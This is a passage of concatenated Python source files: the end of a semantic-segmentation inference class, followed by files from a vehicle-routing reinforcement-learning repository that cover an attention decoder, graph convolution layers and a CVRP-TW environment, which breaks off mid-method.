Since overlaid class text is difficult to read below 1080p, we upsample
predictions.
"""
in_fname_stem = Path(self.input_file).stem
output_gray_fpath = f'{in_fname_stem}_gray.jpg'
output_demo_fpath = f'{in_fname_stem}_overlaid_classes.jpg'
logger.info(f'Write image prediction to {output_demo_fpath}')
rgb_img = imread_rgb(self.input_file)
pred_label_img = self.execute_on_img(rgb_img)
# avoid blurry images by upsampling RGB before overlaying text
if np.amin(rgb_img.shape[:2]) < min_resolution:
rgb_img = resize_img_by_short_side(rgb_img, min_resolution, 'rgb')
pred_label_img = resize_img_by_short_side(pred_label_img, min_resolution, 'label')
metadata = None
frame_visualizer = Visualizer(rgb_img, metadata)
overlaid_img = frame_visualizer.overlay_instances(
label_map=pred_label_img,
id_to_class_name_map=self.id_to_class_name_map
)
imageio.imwrite(output_demo_fpath, overlaid_img)
imageio.imwrite(output_gray_fpath, pred_label_img)
def create_path_lists_from_dir(self) -> None:
"""
Populate a .txt file with relative paths that will be used to create
a Pytorch dataloader.
Args:
- None
Returns:
- None
"""
self.args.data_root = self.input_file
txt_output_dir = str(Path(f'{_ROOT}/temp_files').resolve())
txt_save_fpath = dump_relpath_txt(self.input_file, txt_output_dir)
self.args.test_list = txt_save_fpath
def create_test_loader(self):
"""
Create a Pytorch dataloader from a dataroot and list of
relative paths.
"""
test_transform = transform.Compose([transform.ToTensor()])
test_data = dataset.SemData(
split=self.args.split,
data_root=self.args.data_root,
data_list=self.args.test_list,
transform=test_transform
)
index_start = self.args.index_start
if self.args.index_step == 0:
index_end = len(test_data.data_list)
else:
            index_end = min(index_start + self.args.index_step, len(test_data.data_list))
test_data.data_list = test_data.data_list[index_start:index_end]
self.data_list = test_data.data_list
test_loader = torch.utils.data.DataLoader(
test_data,
batch_size=1,
shuffle=False,
num_workers=self.args.workers,
pin_memory=True
)
return test_loader
def execute_on_img_single(self, image: np.ndarray) -> np.ndarray:
"""
Rather than feeding in crops w/ sliding window across the full-res image, we
downsample/upsample the image to a default inference size. This may differ
from the best training size.
For example, if trained on small images, we must shrink down the image in
testing (preserving the aspect ratio), based on the parameter "base_size",
which is the short side of the image.
Args:
- image: Numpy array representing RGB image
Returns:
- gray_img: prediction, representing predicted label map
"""
h, w, _ = image.shape
scale = 1.
image_scale = resize_by_scaled_short_side(image, self.base_size, scale)
prediction = self.scale_process_cuda(image_scale, h, w)
prediction = prediction.argmax(axis=2)
gray_img = np.uint8(prediction)
return gray_img
def execute_on_img(self, image: np.ndarray) -> np.ndarray:
"""
Rather than feeding in crops w/ sliding window across the full-res image, we
downsample/upsample the image to a default inference size. This may differ
from the best training size.
For example, if trained on small images, we must shrink down the image in
testing (preserving the aspect ratio), based on the parameter "base_size",
which is the short side of the image.
Args:
- image: Numpy array representing RGB image
Returns:
- gray_img: prediction, representing predicted label map
"""
h, w, _ = image.shape
prediction = np.zeros((h, w, self.pred_dim), dtype=float)
prediction = torch.Tensor(prediction).cuda()
for scale in self.scales:
image_scale = resize_by_scaled_short_side(image, self.base_size, scale)
prediction = prediction + torch.Tensor(self.scale_process_cuda(image_scale, h, w)).cuda()
prediction /= len(self.scales)
prediction = torch.argmax(prediction, axis=2)
prediction = prediction.data.cpu().numpy()
gray_img = np.uint8(prediction)
return gray_img
def execute_on_video(self, max_num_frames: int = 5000, min_resolution: int = 1080) -> None:
"""
input_file is a path to a video file.
Read frames from an RGB video file, and write overlaid
predictions into a new video file.
Args:
- None
Returns:
- None
"""
in_fname_stem = Path(self.input_file).stem
out_fname = f'{in_fname_stem}_{self.args.model_name}_universal'
out_fname += f'_scales_{self.scales_str}_base_sz_{self.args.base_size}.mp4'
output_video_fpath = f'{_ROOT}/temp_files/{out_fname}'
create_leading_fpath_dirs(output_video_fpath)
logger.info(f'Write video to {output_video_fpath}')
writer = VideoWriter(output_video_fpath)
reader = VideoReader(self.input_file)
for frame_idx in range(reader.num_frames):
logger.info(f'On image {frame_idx}/{reader.num_frames}')
rgb_img = reader.get_frame()
if frame_idx > max_num_frames:
break
pred_label_img = self.execute_on_img(rgb_img)
# avoid blurry images by upsampling RGB before overlaying text
if np.amin(rgb_img.shape[:2]) < min_resolution:
rgb_img = resize_img_by_short_side(rgb_img, min_resolution, 'rgb')
pred_label_img = resize_img_by_short_side(pred_label_img, min_resolution, 'label')
metadata = None
frame_visualizer = Visualizer(rgb_img, metadata)
output_img = frame_visualizer.overlay_instances(
label_map=pred_label_img,
id_to_class_name_map=self.id_to_class_name_map
)
writer.add_frame(output_img)
reader.complete()
writer.complete()
def execute_on_dataloader(self, test_loader: torch.utils.data.dataloader.DataLoader):
"""
Args:
- test_loader:
Returns:
- None
"""
if self.args.save_folder == 'default':
self.args.save_folder = f'{_ROOT}/temp_files/{self.args.model_name}_{self.args.dataset}_universal_{self.scales_str}/{self.args.base_size}'
os.makedirs(self.args.save_folder, exist_ok=True)
gray_folder = os.path.join(self.args.save_folder, 'gray')
self.gray_folder = gray_folder
check_mkdir(self.gray_folder)
data_time = AverageMeter()
batch_time = AverageMeter()
end = time.time()
results = dict() # path: label_map
for i, (input, _) in enumerate(tqdm.tqdm(test_loader)):
data_time.update(time.time() - end)
# convert Pytorch tensor -> Numpy
input = np.squeeze(input.numpy(), axis=0)
image = np.transpose(input, (1, 2, 0))
gray_img = self.execute_on_img_single(image)
batch_time.update(time.time() - end)
end = time.time()
image_name, _ = self.data_list[i]
img_id = image_name[len(self.input_file):]
results[img_id] = gray_img
# todo: update to time remaining.
if 0 and ((i + 1) % self.args.print_freq == 0) or (i + 1 == len(test_loader)):
logger.info('Test: [{}/{}] '
'Data {data_time.val:.3f} ({data_time.avg:.3f}) '
'Batch {batch_time.val:.3f} ({batch_time.avg:.3f}).'.format(i + 1, len(test_loader),
data_time=data_time,
batch_time=batch_time))
mmcv.dump(results, os.path.join(gray_folder, 'label_maps.pkl'))
def scale_process_cuda(self, image: np.ndarray, h: int, w: int, stride_rate: float = 2/3):
""" First, pad the image. If input is (384x512), then we must pad it up to shape
to have shorter side "scaled base_size".
Then we perform the sliding window on this scaled image, and then interpolate
(downsample or upsample) the prediction back to the original one.
At each pixel, we increment a counter for the number of times this pixel
has passed through the sliding window.
Args:
- image: Array, representing image where shortest edge is adjusted to base_size
- h: integer representing raw image height, e.g. for NYU it is 480
- w: integer representing raw image width, e.g. for NYU it is 640
- stride_rate
Returns:
- prediction: predictions with shorter side equal to self.base_size
"""
start1 = time.time()
ori_h, ori_w, _ = image.shape
image, pad_h_half, pad_w_half = pad_to_crop_sz(image, self.crop_h, self.crop_w, self.mean)
new_h, new_w, _ = image.shape
stride_h = int(np.ceil(self.crop_h*stride_rate))
stride_w = int(np.ceil(self.crop_w*stride_rate))
grid_h = int(np.ceil(float(new_h-self.crop_h)/stride_h) + 1)
grid_w = int(np.ceil(float(new_w-self.crop_w)/stride_w) + 1)
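        # e.g. (illustration): with a 473x473 crop and stride_rate = 2/3 the stride is
        # ceil(473 * 2/3) = 316, so a padded 946x946 input yields
        # grid_h = grid_w = ceil((946 - 473) / 316) + 1 = 3 overlapping crops per dimension.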
prediction_crop = torch.zeros((self.pred_dim, new_h, new_w)).cuda()
count_crop = torch.zeros((new_h, new_w)).cuda()
start = time.time()
for index_h in range(0, grid_h):
for index_w in range(0, grid_w):
s_h = index_h * stride_h
e_h = min(s_h + self.crop_h, new_h)
s_h = e_h - self.crop_h
s_w = index_w * stride_w
e_w = min(s_w + self.crop_w, new_w)
s_w = e_w - self.crop_w
image_crop = image[s_h:e_h, s_w:e_w].copy()
count_crop[s_h:e_h, s_w:e_w] += 1
prediction_crop[:, s_h:e_h, s_w:e_w] += self.net_process(image_crop, flip=False)
start = time.time()
prediction_crop /= count_crop.unsqueeze(0)
# disregard predictions from padded portion of image
prediction_crop = prediction_crop[:, pad_h_half:pad_h_half+ori_h, pad_w_half:pad_w_half+ori_w]
# CHW -> HWC
prediction_crop = prediction_crop.permute(1,2,0)
prediction_crop = prediction_crop.data.cpu().numpy()
prediction = prediction_crop
# upsample or shrink predictions back down to scale=1.0
#prediction = cv2.resize(prediction_crop, (w, h), interpolation=cv2.INTER_LINEAR)
return prediction
def net_process(self, image: np.ndarray, flip: bool = True):
""" Feed input through the network.
In addition to running a crop through the network, we can flip
the crop horizontally, run both crops through the network, and then
average them appropriately.
Args:
- model:
- image:
- flip: boolean, whether to average with flipped patch output
Returns:
- output:
"""
input = torch.from_numpy(image.transpose((2, 0, 1))).float()
normalize_img(input, self.mean, self.std)
input = input.unsqueeze(0)
if self.use_gpu:
input = input.cuda()
if flip:
# add another example to batch dimension, that is the flipped crop
input = torch.cat([input, input.flip(3)], 0)
with torch.no_grad():
output = self.model(input)
_, _, h_i, w_i = input.shape
_, _, h_o, w_o = output.shape
if (h_o != h_i) or (w_o != w_i):
output = F.interpolate(output, (h_i, w_i), mode='bilinear', align_corners=True)
if self.output_taxonomy == 'universal':
output = self.softmax(output)
elif self.output_taxonomy == 'test_dataset':
output = self.convert_pred_to_label_tax_and_softmax(output)
else:
print('Unrecognized output taxonomy. Quitting....')
quit()
# print(time.time() - start1, image_scale.shape, h, w)
if flip:
# take back out the flipped crop, correct its orientation, and average result
output = (output[0] + output[1].flip(2)) / 2
else:
output = output[0]
# output = output.data.cpu().numpy()
# convert CHW to HWC order
# output = output.transpose(1, 2, 0)
# output = output.permute(1,2,0)
return output
def convert_pred_to_label_tax_and_softmax(self, output):
"""
"""
if not self.args.universal:
output = self.tc.transform_predictions_test(output, self.args.dataset)
else:
output = self.tc.transform_predictions_universal(output, self.args.dataset)
return output
# def convert_label_to_pred_taxonomy(self, target):
# """
# """
# if self.args.universal:
# _, target = ToFlatLabel(self.tc, self.args.dataset)(target, target)
# return target.type(torch.uint8).numpy()
# else:
# return target
if __name__ == '__main__':
pass
``` |
{
"source": "jokofa/JAMPR_plus",
"score": 2
} |
#### File: model/decoders/attn_decoder.py
```python
from typing import Union
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch import Tensor, BoolTensor
from lib.model.decoders.base_decoder import BaseDecoder
class AttnDecoder(BaseDecoder):
"""
Attention decoder model.
adapted from:
<NAME>., <NAME>., & <NAME>. (2018).
Attention, learn to solve routing problems!.
arXiv preprint arXiv:1803.08475.
"""
def __init__(self,
query_emb_dim: int,
action_emb_dim: int,
hidden_dim: int = 128,
num_heads: int = 4,
clip_tanh: Union[int, float] = 10.,
bias: bool = False,
**kwargs):
super(AttnDecoder, self).__init__(
query_emb_dim,
action_emb_dim,
hidden_dim
)
self.num_heads = num_heads
self.clip_tanh = clip_tanh
self.bias = bias
head_dim = hidden_dim // num_heads
assert head_dim * num_heads == hidden_dim, "<hidden_dim> must be divisible by <num_heads>!"
self.head_dim = head_dim
# scaling factors for scaled product attention
self.u_norm = (float(head_dim) ** -0.5)
self.nc_norm = (float(hidden_dim) ** -0.5)
self.ctxt_proj, self.set_proj, self.out_proj = None, None, None
self.create_layers(**kwargs)
def create_layers(self, **kwargs):
"""Create the specified model layers."""
self.ctxt_proj = nn.Linear(self.query_emb_dim, self.hidden_dim, bias=self.bias)
# set_proj -> glimpse_key, glimpse_val, logit_key
self.set_proj = nn.Linear(self.action_emb_dim, 3 * self.hidden_dim, bias=self.bias)
self.out_proj = nn.Linear(self.hidden_dim, self.hidden_dim, bias=self.bias)
def reset_parameters(self):
self.ctxt_proj.reset_parameters()
self.set_proj.reset_parameters()
self.out_proj.reset_parameters()
def forward(self,
query_emb: Tensor,
action_emb: Tensor,
mask: BoolTensor,
**kwargs):
# calculate projections and create heads
ctxt = self._make_heads(self.ctxt_proj(query_emb[:, None, :]))
# split projection of size 3x hidden_dim: glimpses -> (n_heads, BS*M, hdim)
glimpse_key, glimpse_val, logit_key = self._split_set(self.set_proj(action_emb))
# compatibility (scoring) --> (n_heads, BS, 1, K)
x = torch.matmul(ctxt, glimpse_key.transpose(-2, -1)) * self.u_norm
# mask compatibility
if mask is not None:
x[mask[None, :, None, :].expand_as(x)] = float('-inf')
# compute attention heads --> (n_heads, BS, K, 1, head_dim)
x = torch.matmul(F.softmax(x, dim=-1), glimpse_val)
# calculate projection for updated context embedding (BS, 1, hdim)
x = self.out_proj(
x.permute(1, 2, 0, 3).contiguous().view(-1, 1, self.hidden_dim)
)
# compute logits --> (BS, K)
x = torch.matmul(x, logit_key.transpose(-2, -1)).squeeze(-2) * self.nc_norm
# tanh clipping/saturation
if self.clip_tanh:
x = torch.tanh(x) * self.clip_tanh
# apply mask
if mask is not None:
x[mask] = float('-inf')
return F.log_softmax(x, dim=-1) # logits
def _make_heads(self, x: Tensor):
"""Makes attention heads for the provided glimpses (BS, N, emb_dim)"""
return (
x.contiguous()
.view(x.size(0), x.size(1), self.num_heads, -1) # emb_dim --> head_dim * n_heads
.permute(2, 0, 1, 3) # (n_heads, BS, N, head_dim)
)
def _split_set(self, x):
"""Split projected tensor into required components."""
glimpse_key, glimpse_val, logit_key = x.chunk(3, dim=-1)
return self._make_heads(glimpse_key), self._make_heads(glimpse_val), logit_key.contiguous()
# ============= #
# ### TEST #### #
# ============= #
def _test(
bs: int = 5,
n: int = 10,
k: int = 3,
cuda=False,
seed=1
):
device = torch.device("cuda" if cuda and torch.cuda.is_available() else "cpu")
torch.manual_seed(seed)
QDIM = 64
ADIM = 32
num_a = (n//2)*k
q_emb = torch.randn(bs, QDIM).to(device)
a_emb = torch.randn(bs, num_a, ADIM).to(device)
mask = torch.randint(0, 2, (bs, num_a)).to(dtype=torch.bool, device=device)
dec = AttnDecoder(QDIM, ADIM).to(device)
logits = dec(q_emb, a_emb, mask)
assert logits.size() == torch.empty((bs, num_a)).size()
return True
```
#### File: model/encoders/eg_graph_conv.py
```python
from typing import Tuple
from torch_geometric.typing import Adj
import torch
import torch.nn as nn
from torch import Tensor
from torch_scatter import scatter_sum
from torch_geometric.nn.conv import MessagePassing
from lib.utils import get_activation_fn, get_norm
#
class EGGConv(MessagePassing):
"""Gated graph convolution using node and edge information
('edge gated graph convolution' - EGGC).
torch geometric implementation based on original formulation in
- Bresson and Laurent 2018, Residual Gated Graph ConvNets
- Joshi et al. 2019, An Efficient Graph Convolutional Network Technique for the Travelling Salesman Problem
"""
def __init__(self,
in_channels: int,
out_channels: int,
activation: str = "relu",
norm_type: str = "bn",
bias: bool = False,
aggr: str = "mean",
**kwargs):
super(EGGConv, self).__init__(aggr=aggr, **kwargs)
self.in_channels = in_channels
self.out_channels = out_channels
self.activation = activation
self.norm_type = norm_type
self.act = get_activation_fn(activation, module=True, inplace=False)
assert in_channels == out_channels, f"currently only works for 'in_channels' == 'out_channels'"
self.w1 = nn.Linear(in_channels, out_channels, bias=bias)
self.w2 = nn.Linear(in_channels, out_channels, bias=bias)
self.w3 = nn.Linear(in_channels, out_channels, bias=bias)
self.w4 = nn.Linear(in_channels, out_channels, bias=bias)
self.w5 = nn.Linear(in_channels, out_channels, bias=bias)
self.edge_norm = get_norm(norm_type, hdim=out_channels)
self.node_norm = get_norm(norm_type, hdim=out_channels)
def reset_parameters(self):
self.w1.reset_parameters()
self.w2.reset_parameters()
self.w3.reset_parameters()
self.w4.reset_parameters()
self.w5.reset_parameters()
def forward(self,
x: Tensor,
edge_index: Adj,
e: Tensor,
) -> Tuple[Tensor, Tensor]:
# message passing
new_x, new_e = self.propagate(edge_index, x=x, e_ij=e)
# apply BN and activation
x = x + self.act(self.node_norm(self.w1(x) + new_x))
e = e + self.act(self.edge_norm(new_e))
return x, e
def message(self,
x_i: Tensor,
x_j: Tensor,
e_ij: Tensor,
index: Tensor
) -> Tuple[Tensor, Tensor]:
# calculate node proj
w2x_j = self.w2(x_j)
# calculate gates
eta_ij = torch.sigmoid(e_ij)
gated_x_j = eta_ij * w2x_j
# aggregate
if self.aggr == 'mean':
# rather than a mean this is normalizing the gates!
aggr_x = scatter_sum(gated_x_j, index=index, dim=0) / (1e-20 + scatter_sum(eta_ij, index=index, dim=0))
elif self.aggr == 'sum':
aggr_x = scatter_sum(gated_x_j, index=index, dim=0)
else:
raise RuntimeError(f"aggregation {self.aggr} not supported.")
# calculate edge proj
w3e_ij = self.w3(e_ij)
w4x_i = self.w4(x_i)
w5x_j = self.w5(x_j)
# new edge emb
e_ij = w3e_ij + w4x_i + w5x_j
return aggr_x, e_ij
def aggregate(self, inputs: Tuple[Tensor, Tensor]) -> Tuple[Tensor, Tensor]:
# overwrite with pass through identity,
# since aggregation is already done in message()
return inputs
def __repr__(self):
return '{}(in: {}, out: {}, act_fn: {}, norm: {})'.format(
self.__class__.__name__,
self.in_channels,
self.out_channels,
self.activation,
self.norm_type,
)
#
# ============= #
# ### TEST #### #
# ============= #
def _test(
cuda=False,
seed=1,
):
import sys
device = torch.device("cuda" if cuda and torch.cuda.is_available() else "cpu")
torch.manual_seed(seed)
N = 4
D = 16
x = torch.randn(N, D).to(device)
edge_index = torch.tensor([[0, 1, 2, 2, 3, 3], [0, 0, 1, 1, 3, 2]]).to(device)
edge_weight = torch.randn(edge_index.size(-1), D).to(device)
    conv = EGGConv(D, D).to(device)
try:
x, e = conv(x, edge_index, edge_weight)
assert x.size() == (N, D)
assert e.size() == (edge_index.size(-1), D)
except Exception as e:
raise type(e)(str(e)).with_traceback(sys.exc_info()[2])
```
#### File: model/encoders/graph_conv.py
```python
from typing import Optional, Tuple
from torch_geometric.typing import Adj
import torch
import torch.nn as nn
from torch import Tensor
from torch_geometric.nn.conv import MessagePassing
from lib.utils import get_activation_fn, get_norm
EDGECONVS = [
# edge_weight:
"GCNConv", "GCN2Conv", "GraphConv", "GatedGraphConv",
"TAGConv", "SGConv", "FAConv", "APPNP", "ARMAConv",
# edge_attr:
"TransformerConv", "GINEConv", "GMMConv", "GENConv", "GATv2Conv",
]
#
# NOTE: just for the record - we use the following ordering on layers: (Conv/Lin -> Act -> Norm)
#
class GraphConvBlock(nn.Module):
"""
Full graph convolutional block including
convolution and activation as well as optional
norm, skip connection and added linear layer.
"""
def __init__(self,
conv: MessagePassing,
in_channels: int,
out_channels: int,
activation: str = "gelu",
skip: bool = True,
norm_type: Optional[str] = "ln",
add_linear: bool = False,
aggr: str = "max",
**kwargs
):
super(GraphConvBlock, self).__init__()
self.conv = conv(
in_channels=in_channels,
out_channels=out_channels,
aggr=aggr,
**kwargs
)
self.activation = activation
self.act = get_activation_fn(activation, module=True, **kwargs)
self.norm_type = norm_type
self.norm = get_norm(norm_type, hdim=out_channels, **kwargs)
self.skip = skip
if self.skip and in_channels != out_channels:
raise RuntimeError(f"To apply skip connection, in_channels and out_channels must be the same!")
self.add_linear = add_linear
self.lin = nn.Linear(out_channels, out_channels) if add_linear else None
self.lin_norm = get_norm(norm_type, hdim=out_channels, **kwargs) if add_linear else None
self.reset_parameters()
def reset_parameters(self):
self.conv.reset_parameters()
if self.add_linear:
self.lin.reset_parameters()
def forward(self,
x: Tensor,
edge_index: Adj,
edge_weight: Optional[Tensor] = None,
**kwargs) -> Tuple[Tensor, Tensor]:
if self.skip:
x_ = x
if self.conv.__class__.__name__ in EDGECONVS:
# provide additional edge weights / attributes
x = self.act(self.conv(x, edge_index, edge_weight, **kwargs))
else:
x = self.act(self.conv(x, edge_index, **kwargs))
if self.skip:
x += x_
if self.norm is not None:
x = self.norm(x)
if self.add_linear:
if self.skip:
x_ = x
x = self.act(self.lin(x))
if self.skip:
x += x_
if self.lin_norm is not None:
                x = self.lin_norm(x)
return x, edge_weight
def __repr__(self):
return '{}(conv={}, in={}, out={}, act_fn={}, norm={}, skip={}, add_linear={})'.format(
self.__class__.__name__,
self.conv.__class__.__name__,
self.conv.in_channels,
self.conv.out_channels,
self.act.__class__.__name__,
self.norm_type,
self.skip,
self.add_linear,
)
#
# ============= #
# ### TEST #### #
# ============= #
def _test(
cuda=False,
seed=1,
**kwargs
):
import sys
import torch_geometric.nn as gnn
device = torch.device("cuda" if cuda and torch.cuda.is_available() else "cpu")
torch.manual_seed(seed)
conv_types_with_ew = ["GCNConv", "GraphConv"]
conv_types_without_ew = ["ResGatedGraphConv", "GATConv", "GATv2Conv", "ClusterGCNConv"]
conv_types = conv_types_with_ew + conv_types_without_ew
norm_types = [None, "ln", "bn"]
D = 16
x = torch.randn(4, D).to(device)
edge_index = torch.tensor([[0, 1, 2, 3], [0, 0, 1, 1]]).to(device)
edge_weight = torch.randn(edge_index.size(-1)).to(device)
for c_type in conv_types:
for norm in norm_types:
try:
c_ = getattr(gnn, c_type)
conv = GraphConvBlock(c_, D, D, norm_type=norm).to(device)
if c_type in conv_types_with_ew:
out, _ = conv(x, edge_index, edge_weight)
else:
out, _ = conv(x, edge_index)
assert out.size() == (4, D)
except Exception as e:
raise type(e)(str(e)+f" - (conv: {c_type}, norm: {norm})\n").with_traceback(sys.exc_info()[2])
```
#### File: lib/routing/env.py
```python
import math
from typing import List, Tuple, Union, Optional
import time
import warnings
import logging
import numpy as np
import torch
from lib.routing.formats import RPInstance, RPObs
from lib.routing.visualization import Viewer
from lib.utils.graph_utils import GraphNeighborhoodSampler
from lib.utils.challenge_utils import dimacs_challenge_dist_fn
from lib.utils.seq_match import plan_to_string_seq, get_similarity_scores
logger = logging.getLogger("ENV")
class RPEnv:
"""
RL simulation environment to solve CVRP-TW.
Provides similar functionality to an OpenAI Gym environment,
but is natively batched and can be run completely on GPU.
"""
OBSERVATION_SPACE = {
"node_features": 7,
"tour_features": 5,
}
def __init__(self,
check_feasibility: bool = False,
max_concurrent_vehicles: int = 3,
k_nbh_frac: float = 0.25,
pomo: bool = False,
pomo_nbh_frac: float = 0.25,
pomo_single_start_node: bool = False,
num_samples: int = 1,
enable_render: bool = False,
plot_save_dir: Optional[str] = None,
device: Union[torch.device, str] = 'cpu',
fp_precision: torch.dtype = torch.float,
inference: bool = False,
tour_graph_update_step: int = 1,
debug: Union[bool, int] = False,
):
"""
Args:
check_feasibility: flag to check feasibility of updates
max_concurrent_vehicles: max number of concurrently planned vehicles
k_nbh_frac: fraction of graph_size defining size of node neighborhood
pomo: flag to use POMO sampling
pomo_nbh_frac: fraction of early TW to use as possible sampling candidates
pomo_single_start_node: flag to fix only one single node per POMO rollout,
independent of max_concurrent_vehicles
num_samples: number of samples per instance
enable_render: flag to enable rendering of environment
plot_save_dir: directory to save rendered GIF files
device: torch device to run env on
fp_precision: floating point precision for float valued tensors
tour_graph_update_step: number of steps when to update the tour edge graph
inference: flag to put env in inference mode
debug: flag to do additional checks and print additional debug information
"""
self.check_feasibility = check_feasibility # check feasibility of updates
self.max_concurrent_vehicles = max_concurrent_vehicles
self.k_nbh_frac = k_nbh_frac
self.pomo = pomo
if self.pomo:
if num_samples <= 1:
warnings.warn(f"POMO should use num_samples > 1")
self._num_samples = num_samples
elif inference:
self._num_samples = num_samples
else:
self._num_samples = 1
self.pomo_nbh_frac = pomo_nbh_frac
self.pomo_single_start_node = pomo_single_start_node
self.enable_render = enable_render
self.plot_save_dir = plot_save_dir
self.device = torch.device(device)
self.fp_precision = fp_precision
assert tour_graph_update_step != 0
self.tour_graph_update_step = tour_graph_update_step
self.inference = inference
self.debug_lvl = 2 if isinstance(debug, bool) and debug else int(debug)
if self.debug_lvl > 0:
self.check_feasibility = True
if self.debug_lvl > 2:
warnings.simplefilter('always', RuntimeWarning)
self.nbh_sampler = None
self.bs = None
self._bidx = None
self._total = None
self.coords = None
self.demands = None
self.tw = None
self.service_time = None
self.graph_size = None
self.org_service_horizon = None
self.max_vehicle_number = None
self.vehicle_capacity = None
self.service_horizon = None
self.time_to_depot = None
self._dist_mat = None
self._visited = None # nodes that have been visited (served)
self._finished = None # vehicles which have started a tour and returned to the depot
self.tour_plan = None
self.active_vehicles = None # which vehicles are currently active
        self.active_to_plan_idx = None # map absolute vehicle idx to idx in vehicle buffer
self.next_index_in_tour = None # index at which to add next node to plan for each active vehicle
# dynamic vehicle features
self.cur_node = None
self.cur_cap = None
self.cur_time = None
self.cur_time_to_depot = None
# graph buffers
self.k_nbh_size = None
self.depot_idx = None
self._tour_batch_idx = None
self.nbh_edges, self.nbh_weights = None, None
self.tour_edges, self.tour_weights = None, None
self.ordered_idx = None
self.viewer = None
self.render_buffer = None
self._zero = torch.zeros(1, dtype=torch.long, device=self.device)
self._one = torch.ones(1, dtype=self.fp_precision, device=self.device)
self._has_instance = False
self._is_reset = False
self._step = None
self._render_cnt = 0
def seed(self, seed: int) -> List[int]:
torch.manual_seed(seed)
return [seed]
def reset(self) -> RPObs:
"""Reset the simulator and return the initial state."""
assert self._has_instance, f"need to load instance first."
self._step = 0
# reset graph buffers
self.depot_idx = None
self.ordered_idx = None
self.nbh_edges, self.nbh_weights = None, None
self.tour_edges, self.tour_weights = None, None
self._tour_batch_idx = None
# create graph attributes
self.to_graph()
# reset other buffers
self._visited = torch.zeros(self.bs, self.graph_size,
dtype=torch.bool, device=self.device)
self._finished = torch.zeros(self.bs, self.max_vehicle_number,
dtype=torch.bool, device=self.device)
seq_buffer_len = min(64, self.graph_size)
self.tour_plan = torch.zeros(self.bs, self.max_vehicle_number, seq_buffer_len,
dtype=torch.int16, device=self.device)
self.active_vehicles = torch.zeros(self.bs, self.max_vehicle_number,
dtype=torch.bool, device=self.device)
# set first max_concurrent vehicles as active
self.active_vehicles[:, :self.max_concurrent_vehicles] = 1
self.active_to_plan_idx = self.active_vehicles.nonzero(as_tuple=True)[1].view(self.bs, -1)
self.next_index_in_tour = torch.zeros(self.bs, self.max_concurrent_vehicles,
dtype=torch.long, device=self.device)
self.cur_node = torch.zeros(self.bs, self.max_concurrent_vehicles,
dtype=torch.long, device=self.device)
self.cur_cap = torch.full((self.bs, self.max_concurrent_vehicles), self.vehicle_capacity,
dtype=self.fp_precision, device=self.device)
self.cur_time = torch.zeros(self.bs, self.max_concurrent_vehicles,
dtype=self.fp_precision, device=self.device)
self.cur_time_to_depot = torch.zeros(self.bs, self.max_concurrent_vehicles,
dtype=self.fp_precision, device=self.device)
if self.enable_render:
if self.viewer is not None:
self.viewer.save()
self.viewer.close()
self.viewer = None
self.render_buffer = {}
self._render_cnt += 1
self._total = torch.zeros(self.bs, dtype=self.fp_precision, device=self.device)
# POMO start node sampling
if self.pomo:
self._reset_pomo()
self._is_reset = True
return self._get_observation()
def step(self, action: torch.Tensor):
"""Take an action and do one step in the environment.
Args:
action: (BS, 2) - selected tour idx, selected node idx
Returns:
- observations,
- reward (cost),
- done,
- info dict
"""
assert self._is_reset
assert action.size(0) == self.bs and action.size(1) == 2
# action is selected tour and next node for that tour
tour_select = action[:, 0]
next_node = action[:, 1]
ret_mask = (next_node == self.depot_node)
cost = self._update(tour_select, next_node, ~ret_mask)
# convert selection idx to internal tour plan idx over max vehicles
tour_plan_select = self.active_to_plan_idx[self._bidx, tour_select]
# add next node in tour
nxt = self.next_index_in_tour[self._bidx, tour_select]
try:
self.tour_plan[self._bidx, tour_plan_select, nxt] = next_node.to(torch.int16)
except IndexError:
# this can also happen when the depot is not properly masked during inference
inf_msk = (nxt >= 64)
n_inf = inf_msk.sum()
inf_tours = self.tour_plan[inf_msk][self.active_vehicles[inf_msk]]
raise RuntimeError(f"Current rollout could not solve at least {n_inf} instances."
f"\nmax_len tours: {inf_tours}")
# increase idx of next position in tour
# (mask if selects depot, otherwise might exceed max seq len!)
not_ret = ~ret_mask
self.next_index_in_tour[self._bidx[not_ret], tour_select[not_ret]] = nxt[not_ret] + 1
all_visited = self.visited.all(-1)
self._visited[self._bidx, next_node] = 1
# depot node is never marked as visited!
self._visited[:, 0] = 0
# manage returning tours (and init new tour on return)
ret_mask = ret_mask & ~all_visited
if ret_mask.any():
nxt_active = self._get_next_active_vehicle()[ret_mask]
all_started = (nxt_active == 0)
ret_idx = ret_mask.nonzero(as_tuple=True)[0]
if all_started.any():
warnings.warn("used all available vehicles!", RuntimeWarning)
# remove idx of instance without further vehicles from indices to reset
ret_idx = ret_idx[~all_started]
nxt_active = nxt_active[~all_started]
ret_tour_idx = tour_select[ret_idx]
# reset buffers
self.cur_node[ret_idx, ret_tour_idx] = self.depot_node[ret_idx]
self.cur_cap[ret_idx, ret_tour_idx] = self.vehicle_capacity
if self.check_feasibility:
assert (self.cur_time[ret_idx, ret_tour_idx] <= 1.0).all()
self.cur_time[ret_idx, ret_tour_idx] = 0
assert (self.cur_time_to_depot[ret_idx, ret_tour_idx] == 0).all()
# update active and returned vehicles
cur_active = self.active_to_plan_idx[ret_idx, ret_tour_idx]
self._finished[ret_idx, cur_active] = 1
self.active_vehicles[ret_idx, cur_active] = 0
self.active_vehicles[ret_idx, nxt_active] = 1
self.next_index_in_tour[ret_idx, ret_tour_idx] = 0
# set active-plan idx map of currently returning vehicle to
# the plan idx of the next vehicle
self.active_to_plan_idx[ret_idx, ret_tour_idx] = nxt_active
# stop if
# 1) all nodes were visited or
# 2) all vehicles were used, in which case there might still be unvisited nodes!
done = self.visited.all() or self._step >= self.graph_size + self.max_vehicle_number + 1
if done:
# make sure all vehicles return to depot
added_cost = self._return_all()
cost += added_cost
# add cost for singleton tours to remaining unvisited nodes
if not self.visited.all():
s_bs_idx, s_nd_idx = (~self.visited).nonzero(as_tuple=True)
singleton_cost = self.time_to_depot[:, 1:][s_bs_idx, s_nd_idx] * 2
bs_idx, cnt_per_idx = s_bs_idx.unique(return_counts=True)
n_unq = len(bs_idx)
cst = torch.empty((n_unq, ), device=self.device, dtype=singleton_cost.dtype)
for i, (s, e) in enumerate(zip(self._cumsum0(cnt_per_idx), cnt_per_idx.cumsum(dim=-1))):
cst[i] = singleton_cost[s:e].sum()
cost[bs_idx] = cost[bs_idx] + cst
self._has_instance = False
self._is_reset = False
# update graph data
self.to_graph()
self._total += cost
info = {
'current_total_cost': self._total.cpu().numpy(),
'k_used': self.k_used.cpu().numpy() if done and len(self.k_used) > 0 else [-1],
'max_tour_len': self.tour_plan.argmin(dim=-1).max().item(),
}
self._step += 1
